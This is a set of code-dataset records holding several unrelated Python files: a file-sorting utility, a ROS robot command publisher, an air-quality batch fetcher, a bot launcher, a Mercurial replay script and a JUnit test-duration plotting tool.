KeyError:\n\t\t\t\t\t\tsignificat_key += rez['text'] + \" \"\n\t\t\tsignificat_keys += tuple([significat_key.strip()])\n\t\treturn significat_keys\n\n\tdef get_real_keys(significat_keys):\n\t\treal_keys = []\n\t\tfor search_key in significat_keys:\n\t\t\tfor real_key in knowledge[0].keys():\n\t\t\t\tk = compare_phrase(search_key, real_key)\n\t\t\t\tif k > 0.55:\n\t\t\t\t\treal_keys += [real_key]\n\n\t\treturn real_keys\n\n\tdef find_kb_keys(real_keys):\n\t\tfound_keys = []\n\t\tfound_keys = []\n\t\tfor rel in knowledge[1].keys():\n\t\t\tfor key in real_keys:\n\t\t\t\ttry:\n\t\t\t\t\trel.index(key)\n\t\t\t\t\tfound_keys += [rel]\n\t\t\t\texcept ValueError:\n\t\t\t\t\tpass\n\t\t\tif len(found_keys) >= len(real_keys):\n\t\t\t\tbreak\n\t\treturn found_keys\n\n\tans = {}\n\tfor q in questions.keys():\n\t\tans.update({q:{}})\n\t\tfor a in questions[q].keys():\n\t\t\ttext = q + ' ' + questions[q][a]\n\t\t\tterms = [str(term) for term in term_extractor(text)]\n\t\t\tneg = is_negative(text)\n\t\t\tsignificat_keys = get_significat_keys(terms)\n\t\t\treal_keys = get_real_keys(significat_keys)\n\t\t\tfound_keys = find_kb_keys(real_keys)\n\t\t\t# print(\"%s) %s\\n%s\\nt %s\\nsk %s\\nrk %s\\nfk %s\" % (a, text, neg, terms, significat_keys, real_keys, found_keys))\n\n\n\t\t\tans[q].update({a:[neg * len(found_keys), questions[q][a], found_keys]})\n\t\t\t#.update({})\n\t\tmax = ['', -100]\n\t\tfor a in ans[q].keys():\n\t\t\tif ans[q][a][0] > max[1]:\n\t\t\t\tmax[1] = ans[q][a][0]\n\t\t\t\tmax[0] = a\n\t\tfor a in ans[q].keys():\n\t\t\tif a == max[0]:\n\t\t\t\tans[q][a][0] = 1\n\t\t\telse:\n\t\t\t\tans[q][a][0] = 0\n\t\t# print(max)\n\treturn ans\n\ndef to_graph(data):\n\twith open('graph.dot', 'w') as g:\n\t\tg.write('digraph g {\\n')\n\t\tfor k in data.keys():\n\t\t\tg.write('\"%s\" -> \"%s\" [label=\"%s\"]' % (k[0], k[2], k[1]))\n\t\tg.write('}\\n')\n\t\tg.close()\n\nif __name__ == '__main__':\n\timport sys\n\tdata = load_data('data.json')\n\tto_graph(data[1])\n\tq = load_q('test.json')\n\ta = answer(data,q)\n\tprint(dumps(a, indent = 4, ensure_ascii = 0))\n\tk = load_key('key.json')\n\tcheck_key(a, k)\n\t# Вызов парсера\n\ttokenize(u'Красивая и загадочная Оля написала и отправила мне длинное и информативное сообщение и письмо.')\n","sub_path":"q.py","file_name":"q.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"281231575","text":"from datetime import timedelta\n\nimport pandas as pd\nimport requests\n\nfrom config import configuration\nfrom date import date_to_str\nfrom kafka_client import KafkaWithoutRegistry\nfrom utils import get_valid_devices\n\n\"\"\"\n:Api Documentation: https://api-guide.clarity.io/\n\"\"\"\n\n\nclass KccaBatchFetch:\n\n def __init__(self):\n self.kafka_client = KafkaWithoutRegistry(boot_strap_servers=configuration.BOOT_STRAP_SERVERS,\n topic=configuration.OUTPUT_TOPIC)\n self.devices = get_valid_devices(configuration.AIRQO_BASE_URL, \"kcca\")\n self.device_codes_str = self.__get_devices_codes()\n super().__init__()\n\n def begin_fetch(self):\n interval = f\"{configuration.BATCH_FETCH_TIME_INTERVAL}H\"\n\n dates = pd.date_range(configuration.START_TIME, configuration.END_TIME, freq=interval)\n\n for date in dates:\n start_time = date_to_str(date)\n end_time = date_to_str(date + timedelta(hours=int(configuration.BATCH_FETCH_TIME_INTERVAL)))\n\n print(start_time + \" : \" + end_time)\n\n measurements = self.__get_measurements(start_time, end_time)\n\n measurements_df = 
pd.DataFrame(measurements)\n\n if measurements_df.empty:\n print(\"No Data at the moment\")\n print(measurements_df)\n continue\n\n transformed_data = []\n for _, row in measurements_df.iterrows():\n\n measurement = row.to_dict()\n transformed_data.append(measurement)\n\n if transformed_data:\n self.kafka_client.produce(transformed_data)\n\n def __get_measurements(self, start_time, end_time):\n\n api_url = f\"{configuration.CLARITY_API_BASE_URL}measurements?\" \\\n f\"startTime={start_time}&endTime={end_time}&code={self.device_codes_str}\"\n\n # frequency = configuration.FREQUENCY.strip().lower()\n # if frequency == \"hour\":\n # api_url = f\"{api_url}&average=hour\"\n # elif frequency == \"day\":\n # api_url = f\"{api_url}&average=day\"\n # else:\n # pass\n\n headers = {'x-api-key': configuration.CLARITY_API_KEY, 'Accept-Encoding': 'gzip'}\n results = requests.get(api_url, headers=headers)\n if results.status_code != 200:\n print(f\"{results.content}\")\n return []\n return results.json()\n\n def __get_devices_codes(self):\n\n device_data = list(self.devices)\n\n device_codes = \"\"\n\n for device in device_data:\n device_data = dict(device)\n device_codes = device_codes + f\"{device_data.get('name')},\"\n\n return device_codes[:-1]\n","sub_path":"src/data-mgt/python/batch-jobs/kcca_batch_fetch.py","file_name":"kcca_batch_fetch.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"252591375","text":"from geometry_msgs.msg import Twist\n\n\nclass CommandPublisher(object):\n \"\"\" Class for robot commands publishing:\n\n Attributes:\n publisher: ROS publisher\n wheel_distance: distance between wheels centers\n max_speed: maximally achievable linear speed\n indicator_linear: speed index as a percentage of maximum linear speed\n linear_speed = (indicator_linear / 100) * max_speed\n indicator_angular: speed index as a percentage of maximum angular speed\n angular_speed = (indicator_angular) / 100 * \\\n (max_speed_linear / (wheel_distance / 2)\n \"\"\"\n\n def __init__(self, publisher, wheel_distance=0.27, max_speed=0.8,\n indicator_linear=50, indicator_angular=50):\n self.publisher = publisher\n self.direction_linear = 0\n self.direction_angular = 0\n self.count = 0\n self.indicator_linear = indicator_linear\n self.indicator_angular = indicator_angular\n self.max_speed_linear = max_speed\n self.gas = False\n self.reverse = False\n self.left = False\n self.right = False\n self.increase_speed = False\n self.decrease_speed = False\n self.increase_angle_speed = False\n self.decrease_angle_speed = False\n self.speed_linear = 0\n self.speed_angular = 0\n self.wheel_distance = wheel_distance\n self.control_speed = 0\n self.control_turn = 0\n\n def publish_command(self):\n \"\"\" Function updates commands states and publish ROS Twist message\n \"\"\"\n self.update()\n self.publisher.publish(self.get_twist())\n\n def get_twist(self):\n \"\"\" Function retuns ROS Twist message\n \"\"\"\n twist = Twist()\n twist.linear.x = self.control_speed\n twist.linear.y = 0\n twist.linear.z = 0\n twist.angular.x = 0\n twist.angular.y = 0\n twist.angular.z = self.control_turn\n return twist\n\n def set_indicator_linear(self, value):\n \"\"\" Function set new linear indicator value\n\n :param value: new indicator value\n :type value: int\n\n \"\"\"\n self.indicator_linear = value\n\n def set_indicator_angular(self, value):\n \"\"\" Function set new angular indicator value\n\n :param value: new indicator value\n :type 
value: int\n\n \"\"\"\n self.indicator_angular = value\n\n def update(self):\n \"\"\" Function updates commands states and calculate control linear\n and angular speeds\n \"\"\"\n if self.gas or self.reverse or self.left or self.right:\n if self.gas:\n self.direction_linear = 1\n elif self.reverse:\n self.direction_linear = -1\n else:\n self.direction_linear = 0\n\n if self.left:\n self.direction_angular = 1\n elif self.right:\n self.direction_angular = -1\n else:\n self.direction_angular = 0\n\n self.count = 0\n else:\n self.count += 1\n if self.count >= 2:\n self.direction_linear = 0\n self.direction_angular = 0\n\n if self.increase_speed and self.indicator_linear < 100:\n self.indicator_linear += 2\n if self.decrease_speed and self.indicator_linear > 0:\n self.indicator_linear -= 2\n\n if self.increase_angle_speed and self.indicator_angular < 100:\n self.indicator_angular += 2\n if self.decrease_angle_speed and self.indicator_angular > 0:\n self.indicator_angular -= 2\n\n self.speed_linear = float(\n self.indicator_linear) / 100 * self.max_speed_linear\n self.speed_angular = float(\n self.indicator_angular) / 100 * (self.max_speed_linear / (self.wheel_distance / 2))\n target_speed = self.speed_linear * self.direction_linear\n target_turn = self.speed_angular * self.direction_angular\n\n if target_speed > self.control_speed:\n self.control_speed = min(target_speed, self.control_speed + 0.05)\n elif target_speed < self.control_speed:\n self.control_speed = max(target_speed, self.control_speed - 0.05)\n else:\n self.control_speed = target_speed\n\n if target_turn > self.control_turn:\n self.control_turn = min(target_turn, self.control_turn + 0.5)\n elif target_turn < self.control_turn:\n self.control_turn = max(target_turn, self.control_turn - 0.5)\n else:\n self.control_turn = target_turn\n","sub_path":"plato_control/src/publish_cmd_vel.py","file_name":"publish_cmd_vel.py","file_ext":"py","file_size_in_byte":4634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"433607286","text":"\"\"\"\nManagerie.py | Jackson Callaghan | Sep 2018\n\nManagerie 2.0 - sorts through files according to basic rules, and does not prompt user for permission to delete or move\nfiles. 
See readme for information.\n\n\"\"\"\n\nimport os\nimport configparser\nimport shutil\nimport re\nimport time\nimport logging\n\n\nclass rule:\n\n def __init__(self, name, type, matchtype, match, targetfolder=None):\n self.name = name\n self.type = type\n self.matchtype = matchtype\n self.match = match\n self.targetfolder = targetfolder\n\n def __str__(self):\n return \"{}: {}, {}, {}, {}\".format(self.name, self.type, self.matchtype, self.match, self.targetfolder)\n\n def prep_regex(self):\n if self.matchtype == \"regex\":\n temp = self.match\n self.match = re.compile(temp)\n\nclass sorter:\n\n def __init__(self):\n self.config = configparser.ConfigParser() # makes config object, when read works like list\n self.debug = False # saves debug information to log file\n self.sortdir = \"\"\n self.rules = []\n self.contents = None\n\n self.numbered_file = re.compile(\".*\\([0-9]*\\)\") # regex for a numbered file (windows duplicate format)\n self.number_splitter = re.compile(\"\\([0-9]*\\)\") # regex that matches number of file for removal\n\n open('managerie_log.txt', 'w').close() # opens and closes file to make sure it exists\n logging.basicConfig(filename='managerie_log.txt', level=logging.DEBUG) # sets up log file\n logging.debug(\"Debug Log File Established.\")\n stderrLogger = logging.StreamHandler() # creates stream handler that pipes log entries to stdout (console)\n stderrLogger.setFormatter(logging.Formatter(logging.BASIC_FORMAT)) # sets basic logging format\n logging.getLogger().addHandler(stderrLogger) # adds handler to logger\n\n logging.info(\"Debug Stream Established.\")\n\n try:\n self.get_rules()\n except (FileNotFoundError, KeyError):\n self.unexpected_exit(\"Please create a config file in script directory according to readme.\")\n\n logging.debug(\"Got rules:\")\n for x in self.rules:\n logging.debug(x)\n\n def sort(self):\n logging.debug(\"Attempting to scan directory {}\".format(self.sortdir))\n try:\n with os.scandir(self.sortdir) as contents: # scans given directory and outputs contents\n self.contents = [i for i in contents] # converts (?) 
to list format and stores\n for item in self.contents:\n self.runrules(item, self.contents)\n logging.debug(\"\")\n except FileNotFoundError:\n self.unexpected_exit(\"Sort directory does not exist\")\n logging.debug(\"Sort Complete!\")\n\n def get_rules(self): # reads file and populates list of rules to follow\n self.config.read(\"Managerie.ini\") # reads file into config object\n self.debug = self.config[\"SETTINGS\"][\"Debug\"] # checks if debug is active\n self.sortdir = self.config[\"SETTINGS\"][\"Sort Directory\"] # grabs sort directory\n\n for key, item in enumerate(self.config[\"RULES\"]): # loops through rule part of config\n rule_parse = [x.strip() for x in self.config[\"RULES\"][item].split(',')] # splits comma-separated parts and strips spaces\n logging.debug(\"Grabbed Rule {}:{}\".format(item, rule_parse))\n name = item\n type = rule_parse[0]\n targetfolder = None if type != \"move\" else rule_parse[1]\n matchtype = rule_parse[1 if type != \"move\" else 2]\n if matchtype in (\"regex\", \"condition\"):\n match = \"\".join(rule_parse[2 if type != \"move\" else 3:])\n else:\n match = rule_parse[2 if type != \"move\" else 3:]\n self.rules.append(rule(name, type, matchtype, match, targetfolder)) # creates rules\n\n # config should have deletion rules in the following format:\n # Name = matchtype, match_arg\n\n # config should have sorting rules in the following format:\n # Name = targetfolder, matchtype, match_arg\n\n def is_duplicate(self, file, target=None): # checks if file has duplicate in target location, DELETES if true\n logging.debug(\"Checking if file {} is duplicate...\".format(file.name))\n if target is not None: # checks if there's a target location to check\n with os.scandir(self.sortdir) as contents: # opens target location and scans files into list of file objects\n if re.split(self.number_splitter, file.name)[0] in [os.path.splitext(i.name)[0] for i in contents]:\n self.delfile(file)\n return True\n elif self.numbered_file.match(file.name): # checks if file is a numbered file\n if re.split(self.number_splitter, file.name)[0] in [os.path.splitext(i.name)[0] for i in self.contents]:\n self.delfile(file)\n return True\n else:\n return False\n\n def move(self, file, target): # moves file to target location, or deletes if duplicate in location\n if not self.is_duplicate(file, target):\n if not os.path.isdir(target): # checks if path exists\n logging.warning(\"Target folder does not exist. Creating folder....\")\n os.mkdir(target) # creates path if it does not\n shutil.move(file.path, target + '/' + file.name) # attempts to rename file to target path + filename\n\n def delfile(self, file): # deletes file or folder\n if file.is_file():\n os.remove(file.path)\n else:\n shutil.rmtree(file.path)\n\n def resolve(self, file, rule): # decides whether to move or delete file based on rule\n if rule.type == \"del\":\n logging.debug(\"File {} matches deletion rule {}. Deleting...\".format(file.name, rule.name))\n self.delfile(file)\n return \"deleted\"\n elif rule.type == \"move\":\n logging.debug(\"File {} matches sorting rule {}. Moving...\".format(file.name, rule.name))\n self.move(file, rule.targetfolder)\n return \"moved\"\n\n def runrules(self, file, contents): # runs a file through all rules to find appropriate action\n if file.name in (\"Managerie.ini\", \"Managerie.py\"):\n logging.debug(\"File is Managerie-critical file. Skipping...\")\n return \"Ignored\"\n if file.name == \"managerie_log.txt\":\n logging.debug(\"File is managerie log. 
{}...\".format(\"Deleting\" if not self.debug else \"Skipping\"))\n if self.debug:\n return \"Ignored\"\n else:\n self.delfile(file)\n\n if self.is_duplicate(file): # checks if file is duplicate\n logging.debug(\"File is duplicate in directory. Deleting...\")\n return \"Deleted\"\n\n logging.debug(\"Attempting to match file {} to rule...\".format(file.name))\n for rule in self.rules: # checks if file matches sorting rule\n if rule.matchtype == \"regex\":\n if re.compile(rule.match).match(file.name): # checks against given regex\n return self.resolve(file, rule)\n elif rule.matchtype == \"list\":\n if any(True if x.lower() in file.name.lower() else False for x in rule.match): # checks if file has any keywords in it\n return self.resolve(file, rule)\n elif rule.matchtype == \"condition\":\n try:\n if eval(rule.match): # evaluates code given by config for checking arbitrary conditions\n return self.resolve(file, rule)\n except:\n logging.debug(\"Conditional code failed. Skipping...\")\n continue\n elif rule.matchtype == \"regex_list\":\n if any(True if re.compile(x).match(file.name) else False for x in rule.match):\n return self.resolve(file, rule)\n\n def unexpected_exit(self, msg): # logs error and exits after waiting long enough for user to read error\n logging.error(msg)\n time.sleep(5)\n exit()\n\n\nmysorter = sorter()\nmysorter.sort()\n","sub_path":"Managerie.py","file_name":"Managerie.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"41541434","text":"import argparse\nimport sys\n\n\nclass Launcher:\n def __init__(self):\n parser = argparse.ArgumentParser(description='WalBot', formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\"action\", choices=[x for x in dir(self) if not x.startswith('_')], help='Action for bot')\n parser.add_argument(\"--fast_start\", action=\"store_true\",\n help=\"Disable some things to make bot start faster:\\n\" +\n \"- Disable Markov model check on start\\n\")\n parser.add_argument(\"--patch\", action=\"store_true\",\n help=\"Call script for patching config files before starting the bot\")\n if sys.platform in (\"linux\", \"darwin\"):\n parser.add_argument(\"--nohup\", action=\"store_true\", help=\"Ignore SIGHUP and redirect output to nohup.out\")\n self.args = parser.parse_args()\n getattr(self, self.args.action)()\n\n def start(self):\n \"\"\"Start the bot\"\"\"\n __import__(\"src.bot\", fromlist=['object']).start(self.args)\n\n def stop(self):\n \"\"\"Stop the bot\"\"\"\n __import__(\"src.bot\", fromlist=['object']).stop()\n\n def restart(self):\n \"\"\"Restart the bot\"\"\"\n bot = __import__(\"src.bot\", fromlist=['object'])\n bot.stop()\n bot.start()\n\n def suspend(self):\n \"\"\"Stop the main bot and start mini-bot\"\"\"\n self.stop()\n __import__(\"src.bot\", fromlist=['object']).start(main_bot=False)\n\n\ndef main():\n if not (sys.version_info.major >= 3 and sys.version_info.minor >= 5):\n print(\"Python {}.{}.{} is not supported. 
You need Python 3.5+\".format(\n sys.version_info.major, sys.version_info.minor, sys.version_info.micro))\n sys.exit(1)\n Launcher()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"201876946","text":"#!/usr/bin/python\nimport json\nimport os\nfrom argparse import ArgumentParser\nfrom hackbeil.hgutils import progressui, replay_commit, close_commit, abort_on_error, svnrev\nfrom hackbeil.branchreplay import BranchReplay\nfrom hackbeil.histevents import EventReplay\n\nfrom hackbeil.scripting.convert import targetdirname\n\nfrom mercurial import localrepo\n\n\nparser = ArgumentParser()\nparser.add_argument('replay')\nparser.add_argument('convert_roots')\nparser.add_argument('target_repo')\n\noptions = parser.parse_args()\n\nimport pdb\nimport sys\nsys.excepthook = lambda*k: pdb.pm()\n\nui = progressui()\nui.status('reading replay\\n')\nwith open(options.replay) as fp:\n data = json.load(fp)\n br = BranchReplay.from_json(data)\n\n\nui.status('generating history event list\\n')\ner = EventReplay()\ner.add_replay(br)\n\n\nchunks = er.generate_chunklist()\nui.status('marking default\\n')\ndefault_chunk = er.findchunk('pypy/trunk', br.rev)\nwhile default_chunk is not None:\n default_chunk.given_name = 'default'\n default_chunk = default_chunk.parent\n\ntotal_changesets = 0\nui.status('creating statistics\\n')\nfor idx, branch in enumerate(br.branch_history):\n ui.progress('scanning converts', pos=idx+1, total=len(br.branch_history))\n target = targetdirname(branch)\n repo = localrepo.localrepository(ui, os.path.join(options.convert_roots, target))\n total_changesets += len(repo)\n\nui.status('creating target %s\\n' % options.target_repo)\ntarget_repo = localrepo.localrepository(ui, options.target_repo)\n\n\n\nui.status('building lookup table for completed commits\\n')\ncompleted_lookup = {}\nclosed_commits = set()\n\nfor commit in target_repo:\n ui.progress('scanning', pos=commit+1, total=len(target_repo))\n ctx = target_repo[commit]\n convert_rev = ctx.extra().get('convert_revision')\n completed_lookup[convert_rev] = commit\n if ctx.extra().get('close'):\n closed_commits.add(ctx.parents()[0].rev())\n\nignore_svnrevs = set([\n 10389, # pypy-normalize-exception merge\n 13150, # removes trunk to copy over lltype-refactoring\n 14327, # another delete before merge\n 20004,\n 20558, #somepbc\n 20557, #somepbc\n])\n\ndef crev(ctx): return ctx.extra().get('convert_revision')\n\ndef maybe_replay_commit(repo, base, source_ctx, target_branch=None):\n target = repo[base]\n convert_rev = crev(source_ctx)\n if convert_rev in completed_lookup:\n return completed_lookup[convert_rev]\n # skipping specific bad commits\n if svnrev(source_ctx) in ignore_svnrevs:\n return base\n\n # skipping weird merge tmp commits\n files = source_ctx.files()\n if len(files) == 1 and files[0].endswith('.merge.tmp'):\n return base\n\n unrelated = source_ctx.parents()[0].rev() == -1 or \\\n crev(repo[base]) != crev(source_ctx.parents()[0])\n return replay_commit(repo, base, source_ctx, target_branch, unrelated=unrelated)\n\n\n\ntotal_converted = 0\nfor idx, chunk in enumerate(chunks):\n source_repo_name = targetdirname(chunk.branch)\n ui.status('replaying chunk %s %s/%s\\n'%(chunk, idx+1, len(chunks)))\n source_repo = localrepo.localrepository(\n ui, os.path.join(options.convert_roots, source_repo_name))\n\n if chunk.parent and chunk.parent.branch is 
chunk.branch:\n rev = chunk.parent.nextrev\n else:\n rev = 0\n\n if chunk.parent:\n base = chunk.parent.nextbase\n else:\n base = -1\n\n tr = target_repo.transaction('commit')\n with abort_on_error(tr):\n while True:\n if rev not in source_repo:\n break\n source_ctx = source_repo[rev]\n\n ui.progress('replay',\n pos=total_converted,\n item=source_ctx.hex(),\n total=total_changesets)\n if rev == len(source_repo) or (chunk.end and svnrev(source_ctx) >= chunk.end):\n chunk.nextrev = rev\n chunk.nextbase = base\n if chunk.end is not None and chunk.end == chunk.branch.end:\n if base not in closed_commits:\n close_commit(target_repo, base)\n break\n else:\n base = maybe_replay_commit(target_repo,\n base=base,\n source_ctx=source_ctx,\n target_branch=str(chunk.guessed_name()).split('@')[0]\n )\n rev += 1\n total_converted += 1\n tr.close()\n\n\n\n","sub_path":"bin/replay-hg-history.py","file_name":"replay-hg-history.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"358776136","text":"# coding: utf-8\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport re\nimport sys\nfrom datetime import timedelta\nfrom matplotlib import mlab\n\n'''\nUsage: python plotting_junit_report.py | \n\nJUnit test reports follow the directory structure:\nbuild/reports/tests/integrationTest/\n├── classes\n│ ├── cha.LoginTest0.html\n├── css\n│ ├── base-style.css\n│ └── style.css\n├── index.html\n├── js\n│ └── report.js\n└── packages\n └── cha.html\n\nExamples:\npython plotting_junit_report.py build/reports/tests/integrationTest/classes\npython plotting_junit_report.py build/reports/tests/integrationTest/classes my.kewl.MyTest\n'''\n\n\ndef highlight_class_name_in_ax(class_to_highlight, ax, df):\n if class_to_highlight:\n highlight_index = df[df.fqclass_name == class_to_highlight].index\n assert len(highlight_index) > 0\n highlight_index_int = highlight_index[0]\n highlight_max = highlight_index_int\n highlist_min = highlight_index_int\n\n if (highlight_index_int - 1 >= 0) and (highlight_index_int + 1 <= df.shape[0]):\n highlight_max = highlight_index_int + 1\n highlist_min = highlight_index_int - 1\n\n ax.axvspan(highlist_min, highlight_max, facecolor='red', edgecolor='red', alpha=0.8)\n\n\ndef histogram_test_class_duration(df):\n '''\n If you use too few bins, the histogram doesn't really portray the data very well.\n If you have too many bins, you get a broken comb look, which also doesn't give a sense of the distribution.\n '''\n fig, ax = plt.subplots() # will create a 2nd, blank figure, so provide ax obj to ax keyword arg\n fig.set_tight_layout({\"pad\": .3})\n\n df['timedelta_duration_s'].hist(ax=ax) # , bins=2) # think of bins as the number of gradle test tasks...\n plt.title('Test Class Duration (s) for ' + str(df.shape[0]) + ' total classes', fontsize=11)\n plt.xlabel('Duration (s) bins', fontsize=8)\n plt.ylabel('Number of classes', fontsize=8)\n plt.tight_layout()\n plt.show()\n\n\ndef bar_test_class_duration_by_fqname(df, color_map, class_to_highlight):\n fig, ax = plt.subplots() # will create a 2nd, blank figure, so provide ax obj to ax keyword arg\n fig.set_tight_layout({\"pad\": .3})\n\n df.sort_values(\"fqclass_name\", inplace=True) # sort by fq name\n df = df.reset_index(drop=True) # reindex for xticks\n\n highlight_class_name_in_ax(class_to_highlight, ax, df)\n\n # return a new Series according to the dict mapping\n df.plot.bar(x='fqclass_name', 
y='timedelta_duration_s', ax=ax, color=df['pkg_name'].map(color_map), legend=None)\n plt.title('Test Class Duration (s) for ' + str(df.shape[0]) + ' total classes', fontsize=11)\n plt.ylabel('Duration (s)', fontsize=8)\n plt.xlabel('Class (sorted by fq name)', fontsize=8)\n\n # the class_name is shorter than the fq name, so use that for xticks\n xi = [i for i in range(0, df.shape[0])]\n plt.xticks(xi, df['fqclass_name'])\n plt.show()\n\n\ndef bar_test_class_duration_by_duration(df, color_map, class_to_highlight):\n fig, ax = plt.subplots() # will create a 2nd, blank figure, so provide ax obj to ax keyword arg\n fig.set_tight_layout({\"pad\": .3})\n\n df.sort_values(\"timedelta_duration_s\", inplace=True)\n df = df.reset_index(drop=True) # reindex for xticks\n\n highlight_class_name_in_ax(class_to_highlight, ax, df)\n\n df.plot.bar(x='fqclass_name', y='timedelta_duration_s', ax=ax, color=df['pkg_name'].map(color_map), legend=None)\n\n # plot percentiles\n p = np.array([0.0, 25.0, 50.0, 75.0, 80.0, 90.0, 95.0, 99.0, 100.0])\n\n perc = mlab.prctile(df['timedelta_duration_s'], p=p)\n plt.plot(df['timedelta_duration_s'])\n # red dots for % on graph\n plt.plot(df.shape[0] * p / 100., perc, 'ro')\n\n plt.title('Test Class Duration (s) for ' + str(df.shape[0]) + ' classes. Colored by pkg name. % (' + str(\n p) + ') plotted.',\n fontsize=8)\n plt.ylabel('Duration (s)', fontsize=8)\n plt.xlabel('Class (sorted by duration)', fontsize=8)\n\n # the class_name is shorter than the fq name, so use that for xticks\n xi = [i for i in range(0, df.shape[0])]\n plt.xticks(xi, df['fqclass_name'])\n plt.show()\n\n\ndef plot_num_test_methods_vs_duration(df, color_map):\n fig, ax = plt.subplots() # will create a 2nd, blank figure, so provide ax obj to ax keyword arg\n fig.set_tight_layout({\"pad\": .4})\n ax.scatter(df['timedelta_duration_s'], df['num_test_methods'], s=50, color=df['pkg_name'].map(color_map))\n\n plt.title('Num test methods vs Duration (mm:ss.f) for ' + str(df.shape[0]) + ' total classes', fontsize=11)\n plt.xlabel('Duration', fontsize=8)\n plt.ylabel('Num test methods', fontsize=8)\n\n plt.show()\n\n\n# deprecated for bar_test_class_duration_by_duration\ndef percentiles(df):\n fig, ax = plt.subplots() # will create a 2nd, blank figure, so provide ax obj to ax keyword arg\n fig.set_tight_layout({\"pad\": .3})\n\n df.sort_values(\"timedelta_duration_s\", inplace=True) # sort by timedelta_duration_s\n df = df.reset_index(drop=True) # reindex for xticks\n\n p = np.array([0.0, 25.0, 50.0, 75.0, 80.0, 90.0, 95.0, 99.0, 100.0])\n\n perc = mlab.prctile(df['timedelta_duration_s'], p=p)\n plt.plot(df['timedelta_duration_s'])\n\n length = df.shape[0]\n # red dots for % on graph\n plt.plot(length * p / 100., perc, 'ro')\n\n # % locations and label\n plt.xticks(length * p / 100., map(str, p))\n\n plt.title('Percentile ranks of duration for ' + str(df.shape[0]) + ' total classes' + '% (' + str(\n p) + ') plotted.', fontsize=11)\n plt.ylabel('Duration (s)', fontsize=8)\n plt.xlabel('Percentiles', fontsize=8)\n\n plt.show()\n\n\ndef convert_to_timedelta(text):\n # Examples from the surefire report:\n # 1m33.00s\n # 11.002s\n # 27.000s\n # 7.001s\n # 1m0.00s\n # 1m3.00s\n minute = ''\n seconds = ''\n\n # has a minute, always parse it out\n if 'm' in text:\n minute = text[:text.find('m')]\n\n # has seconds and no minute\n if 's' in text and 'm' not in text:\n seconds = text[:text.find('s')]\n\n # has seconds and no minute\n if 's' in text and 'm' in text:\n seconds_tmp = text[:text.find('s')]\n seconds = 
seconds_tmp[seconds_tmp.find('m') + 1:]\n\n assert 'm' not in minute\n assert 's' not in seconds\n assert len(seconds) > 0\n\n if len(minute) > 0:\n return timedelta(minutes=int(minute), seconds=float(seconds))\n\n return timedelta(seconds=float(seconds))\n\n\ndef parse_surefire_reports_test_class_data(report_classes_directory_path):\n name_re = re.compile('

    Class\\s(.*)

    ')\n name_marker = '
    '\n\n duration_re = re.compile('
    (.*)<\\/div>')\n duration_marker = '
    '\n\n num_test_methods_re = duration_re\n num_test_methods_marker = '
    '\n\n df = pd.DataFrame(columns=['fqclass_name', 'pkg_name', 'duration', 'timedelta_duration', 'timedelta_duration_s',\n 'num_test_methods', 'class_name'])\n num_columns = 7\n file_counter = 0\n ignored_file_counter = 0\n for filename in os.listdir(sys.argv[1]):\n if filename.endswith(\".html\"):\n test_info = [''] * num_columns # contains data for a single file\n with open(os.path.join(sys.argv[1], filename), \"r\") as file:\n file_counter += 1\n previous_line = ''\n for current_line in file:\n if name_marker in previous_line:\n name_match = name_re.findall(current_line)\n if name_match:\n fqclass_name = name_match.pop()\n pkg_name = fqclass_name[:fqclass_name.rfind('.')]\n # print (\"name match ----------------->\", fqclass_name)\n # print (\"pkg name ----------------->\", pkg_name)\n test_info[0] = fqclass_name\n test_info[1] = pkg_name\n test_info[6] = fqclass_name.replace(pkg_name + '.', '')\n if duration_marker in previous_line:\n duration_match = duration_re.findall(current_line)\n if '-' not in duration_match:\n # print (\"duration match ----------------->\", duration_match)\n test_info[2] = duration_match.pop()\n test_info[3] = convert_to_timedelta(test_info[2])\n test_info[4] = test_info[3].total_seconds()\n else: # indicates test suite; ignore, reset test_info, don't add to df\n test_info = []\n ignored_file_counter += 1\n print (\"Ignoring = \", filename)\n break\n if num_test_methods_marker in previous_line:\n num_test_methods_match = num_test_methods_re.findall(current_line)\n if num_test_methods_match:\n test_info[5] = int(num_test_methods_match.pop())\n\n previous_line = current_line\n # print (\"closing file=\",filename)\n\n # print(\"test_info\",test_info)\n if len(test_info) > 0: # don't add info from ignored files\n assert len(test_info) == num_columns\n df.loc[-1] = test_info # df will be in reverse order of parsing, but that's ok\n df.index = df.index + 1\n file.close()\n\n df = df.sort_index()\n print (\"Tot parsed files =\", file_counter)\n print (\"Tot ignored files =\", ignored_file_counter)\n assert file_counter > 0\n assert df.shape[0] == (file_counter - ignored_file_counter)\n df.sort_values(\"timedelta_duration_s\", inplace=True) # sort by timedelta_duration_s\n print (df)\n return df\n\n\ndef main():\n assert len(sys.argv) >= 2\n assert '/classes' in sys.argv[1]\n\n if len(sys.argv) == 3:\n class_to_highlight = sys.argv[2]\n else:\n class_to_highlight = ''\n print (\"Class to highlight =\", class_to_highlight)\n\n # plt.style.use('ggplot') # works in matplotlib 1.4 or greater\n\n df = parse_surefire_reports_test_class_data(sys.argv[1])\n # df.sort_values(\"timedelta_duration_s\", inplace=True, ascending=False) # sort by timedelta_duration_s\n # df = df.reset_index(drop=True) # reindex for xticks\n # df['fqclass_name'].to_csv('my_df.txt', index=False)\n\n color_labels = df['pkg_name'].unique() # these will be keys\n # generate hex codes\n color = [\"#\" + ''.join([random.choice('0123456789ABCDEF') for j in range(6)])\n for i in range(color_labels.shape[0])]\n\n # convert to key:value --> pkg_name:rgb hex\n color_map = dict(zip(color_labels, color))\n\n # histogram_test_class_duration(df)\n bar_test_class_duration_by_fqname(df, color_map, class_to_highlight)\n 